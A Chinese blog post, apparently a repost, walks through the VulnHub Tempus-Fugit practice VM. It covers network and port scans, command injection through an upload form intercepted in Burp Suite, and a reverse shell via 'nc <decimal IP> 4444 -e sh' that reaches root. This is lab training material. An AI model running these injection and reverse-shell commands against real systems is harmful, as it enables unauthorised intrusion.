vulnhub之Tempus-Fugit的实践

admin 2024年5月19日03:11:21评论14 views字数 690阅读2分18秒阅读模式

今天实践的是vulnhub的Tempus-Fugit镜像,过程比较简单,

但都不是常规攻击思路,不看别人的writeup自己搞不定,

下载地址,https://download.vulnhub.com/tempusfugit/Tempus-Fugit.ova,

用virtualbox导入成功,

做地址扫描,sudo netdiscover -r 192.168.0.0/24,

获取到靶机地址192.168.0.195,

其实这步不用地址扫描也行,因为靶机的console上已经显示了地址,

vulnhub之Tempus-Fugit的实践

继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.195,

vulnhub之Tempus-Fugit的实践

有web服务,浏览器访问http://192.168.0.195,

发现upload页面,

vulnhub之Tempus-Fugit的实践

上传文件过程中用burpsuite进行劫持,带入命令,

这步是整个靶机攻击过程的关键,想不到就无法继续,

上传文件

vulnhub之Tempus-Fugit的实践

带入whoami命令,

vulnhub之Tempus-Fugit的实践

页面回显,当前账户是root,

vulnhub之Tempus-Fugit的实践

重新上传文件,带入ls命令,

vulnhub之Tempus-Fugit的实践

页面回显,当前目录下有main.py文件,

vulnhub之Tempus-Fugit的实践

直接带命令查看main.py内容不行,查看main*有效,

vulnhub之Tempus-Fugit的实践

页面回显,

vulnhub之Tempus-Fugit的实践

直接带命令点分式的ip地址的反弹shell命令不行,转成十进制的,

vulnhub之Tempus-Fugit的实践

kali攻击机上开启反弹shell监听,nc -lvp 4444,

burpsuite劫持带入nc 3232235714 4444 -e sh命令,

vulnhub之Tempus-Fugit的实践

获取到反弹shell,id确认是root,

vulnhub之Tempus-Fugit的实践

别人的writeup后面还有更多内容,因为到这步就已经拿到root权限了,我就不继续了。

原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之Tempus-Fugit的实践

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月19日03:11:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之Tempus-Fugit的实践https://cn-sec.com/archives/2024793.html

发表评论

匿名网友 填写信息